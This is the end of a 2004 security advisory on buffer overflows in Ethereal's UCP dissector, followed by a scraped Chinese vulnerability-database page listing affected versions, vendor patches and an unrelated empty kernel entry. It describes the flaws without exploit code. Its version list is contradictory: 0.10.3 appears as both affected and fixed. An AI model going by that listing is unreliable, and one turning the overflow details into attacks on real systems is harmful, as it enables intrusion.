   [12] UCP Protocol Handle Int-Field Overflow
   ----------------------------------------------
   
   Desc: When handling an Integer field within an UCP packet a stack 
         buffer of BUFSIZ bytes may overflow and can therfore lead to 
         remote code execution. 
         To exploit this vulnerability over the wire an attacker must 
         be able to fit more than BUFSIZ bytes into one TCP packet.
         This means it is only exploitable on the wire if the system
         has a MTU bigger than BUFSIZ. BUFSIZ is 8192 on glibc 
         systems, 1024 on BSD systems and 512 on Windows systems.


   [13] UCP Protocol Handle Time-Field Overflow
   ----------------------------------------------
   
   Desc: When handling a Time field within an UCP packet a stack 
         buffer of BUFSIZ bytes may overflow and can therefore lead 
         to remote code execution.
         To exploit this vulnerability over the wire an attacker must 
         be able to fit more than BUFSIZ bytes into one TCP packet.
         This means it is only exploitable on the wire if the system
         has a MTU bigger than BUFSIZ. BUFSIZ is 8192 on glibc 
         systems, 1024 on BSD systems and 512 on Windows systems.


Proof of Concept:

   e-matters is not going to release an exploit for any of these 
   vulnerabilities to the public. 
  

Disclosure Timeline:

    5. March 2004 - Ethereal developers were contacted by email
                    telling them about 10(of the 13) holes.
                    6 holes were closed the same day EIGRP, IGAP,
                    ISUP and BGP.
    7. March 2004 - IRDA hole closed (after checking specs)
    8. March 2004 - PGM hole closed (after checking specs)
    9. March 2004 - NetFlow hole closed (after checking specs)
   17. March 2004 - UCP holes were discovered and mailed to vendor
   19. March 2004 - UCP and TCAP holes closed (after checking specs)
   22. March 2004 - Ethereal developers have releases a mini advisory
                    urging their users to upgrade to version 0.10.3
                    which will be released later this week
   23. March 2004 - Public Disclosure


CVE Information:

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has
   assigned the name CAN-2004-0176 to this issue.


Recommendation:

   Until you can upgrade to version 0.10.3 of Ethereal or to the 
   bugfixed package from your distributor it is strongly recommended
   to disable the following dissectors in the menu:
   
   Analyze->Enabled Protocols
   
   disable: BGP, EIGRP, IGAP, IRDA, ISUP, NetFlow, PGM, TCAP, UCP
   
   
GPG-Key:

   http://security.e-matters.de/gpg_key.asc
    
   pub  1024D/75E7AAD6 2002-02-26 e-matters GmbH - Securityteam
   Key fingerprint = 43DD 843C FAB9 832A E5AB  CAEB 81F2 8110 75E7 AAD6


Copyright 2004 Stefan Esser. All rights reserved.


-- 

--------------------------------------------------------------------------
 Stefan Esser                                        s.esser@e-matters.de
 e-matters Security                         http://security.e-matters.de/

 GPG-Key                gpg --keyserver pgp.mit.edu --recv-key 0xCF6CAE69 
 Key fingerprint       B418 B290 ACC0 C8E5 8292  8B72 D6B0 7704 CF6C AE69
--------------------------------------------------------------------------
 Did I help you? Consider a gift:            http://wishlist.suspekt.org/
--------------------------------------------------------------------------
    

- 漏洞信息

13847
Linux Kernel shmctl() Function Arbitrary Locked Memory Access

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-02-15 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Ethereal Multiple Vulnerabilities
Unknown 9952
Yes Yes
2004-03-22 12:00:00 2009-07-12 03:06:00
Discovery is credited to Stefan Esser and Jonathan Heussser.

- 受影响的程序版本

SGI ProPack 3.0
SGI ProPack 2.4
SGI ProPack 2.3
Gentoo Linux 1.4 _rc3
Gentoo Linux 1.4 _rc2
Gentoo Linux 1.4 _rc1
Gentoo Linux 1.4
Ethereal Group Ethereal 0.10.2
Ethereal Group Ethereal 0.10.1
Ethereal Group Ethereal 0.10
Ethereal Group Ethereal 0.9.16
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
Ethereal Group Ethereal 0.9.15
Ethereal Group Ethereal 0.9.14
Ethereal Group Ethereal 0.9.13
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Red Hat Fedora Core1
Ethereal Group Ethereal 0.9.12
Ethereal Group Ethereal 0.9.11
Ethereal Group Ethereal 0.9.10
+ Conectiva Linux 9.0
Ethereal Group Ethereal 0.9.9
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
Ethereal Group Ethereal 0.9.8
+ RedHat Linux 9.0 i386
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ Terra Soft Solutions Yellow Dog Linux 3.0
Ethereal Group Ethereal 0.9.7
Ethereal Group Ethereal 0.9.6
+ Conectiva Linux Enterprise Edition 1.0
Ethereal Group Ethereal 0.9.5
Ethereal Group Ethereal 0.9.4
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
Ethereal Group Ethereal 0.9.3
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
Ethereal Group Ethereal 0.9.2
Ethereal Group Ethereal 0.9.1
- Compaq Tru64 5.0
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- HP HP-UX 11.0
- IBM AIX 5.1
- Linux kernel 2.4
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0
- NetBSD NetBSD 1.5
- OpenBSD OpenSSH 3.0
- SCO Unixware 7.0
- SGI IRIX 6.0
- Sun Solaris 8_sparc
Ethereal Group Ethereal 0.9
Ethereal Group Ethereal 0.8.19
Ethereal Group Ethereal 0.8.18
- RedHat Linux 7.2 ia64
- RedHat Linux 7.2 i386
- RedHat Linux 7.2
Ethereal Group Ethereal 0.8.14
Ethereal Group Ethereal 0.8.13
Ethereal Group Ethereal 0.10.3
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ Red Hat Fedora Core2
+ Red Hat Fedora Core1
+ S.u.S.E. Linux Personal 9.2
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.0

- 不受影响的程序版本

Ethereal Group Ethereal 0.10.3
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ Red Hat Fedora Core2
+ Red Hat Fedora Core1
+ S.u.S.E. Linux Personal 9.2
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.0

- 漏洞讨论

Ethereal 0.10.3 has been released to address multiple vulnerabilities. These issues include:

- Thirteen stack-based buffer overruns in various protocol dissectors (NetFlow, IGAP, EIGRP, PGM, IrDA, BGP, ISUP, and TCAP).

- A denial of service that is triggered by a zero length Presentation protocol selector.

- Specially crafted RADIUS packets may cause a crash in Ethereal.

- Corrupt color filter files may cause a crash in Ethereal.

These issues may result in a denial of service or potentially be leveraged to execute arbitrary code in the instance of the buffer overruns.

- 漏洞利用

Exploit code has been provided to leverage the EIGRP TLV_IP_INT overflow to produce a denial of service condition. Exploit code to leverage the IGAP issue has been provided as well.

- 解决方案

The vendor has released version 0.10.3 to address these issues.

SGI have released an advisory (20040402-01-U) and a patch to address these issues in SGI ProPack version 2.3 and 2.4. The vendor has advised that customers apply this patch as soon as possible. Further details regarding obtaining and applying an appropriate patch can be found in the referenced advisory. Patch is linked below.

Gentoo have released an advisory (GLSA 200403-07) and updates to address these issues. Gentoo users are advised to upgrade to current packages by emerging the updated packages as follows:
# emerge sync
# emerge -pv ">=net-analyzer/ethereal-0.10.3"
# emerge ">=net-analyzer/ethereal-0.10.3"

Netwosix Linux has released advisory LNSA-#2004-0007 dealing with these issues. Please see the referenced advisory for more information.

RedHat Enterprise Linux has released advisory RHSA-2004:136-09 dealing with this issue. Please see the referenced advisory for more information and details on obtaining fixes.

RedHat has released advisory RHSA-2004:137-01 dealing with this issue. Please see the referenced advisory for more information and details on obtaining fixes.

Mandrake has released an advisory that includes updates for this issue.

Conectiva has released an advisory CLSA-2004:835 to address these issues. Please see the advisory in web references for more details.

OpenPKG has released advisory OpenPKG-SA-2004.015 and an update dealing with this issue. Please see below for the update, and the referenced advisory for more information.

SGI has released an advisory (20040506-01-U) with Patch 10075 for SGI
ProPack 3 to address these and other issues. Please see the referenced
advisory for more information.

Debian has released advisory DSA 511-1 to address this issue. It is noted that CAN-2004-0176 partially affects Debian woody and CAN-2004-0367/CAN-2004-0365 do not affect the distribution at all. Please see the attached advisory for more details on obtaining fixes.

RedHat has released a Fedora legacy advisory (FLSA:1840) to address various issues in Ethereal. This advisory fixes these issues in Red Hat Linux 7.3 and 9 running on the i386 architecture. Please see the referenced advisory for more details and information about obtaining fixes.


Ethereal Group Ethereal 0.10

Ethereal Group Ethereal 0.10.1

Ethereal Group Ethereal 0.10.2

Ethereal Group Ethereal 0.8.13

Ethereal Group Ethereal 0.8.14

Ethereal Group Ethereal 0.8.18

Ethereal Group Ethereal 0.8.19

Ethereal Group Ethereal 0.9

Ethereal Group Ethereal 0.9.1

Ethereal Group Ethereal 0.9.10

Ethereal Group Ethereal 0.9.11

Ethereal Group Ethereal 0.9.12

Ethereal Group Ethereal 0.9.13

Ethereal Group Ethereal 0.9.14

Ethereal Group Ethereal 0.9.15

Ethereal Group Ethereal 0.9.16

Ethereal Group Ethereal 0.9.2

Ethereal Group Ethereal 0.9.3

Ethereal Group Ethereal 0.9.4

Ethereal Group Ethereal 0.9.5

Ethereal Group Ethereal 0.9.6

Ethereal Group Ethereal 0.9.7

Ethereal Group Ethereal 0.9.8

Ethereal Group Ethereal 0.9.9

SGI ProPack 2.3

SGI ProPack 2.4

SGI ProPack 3.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站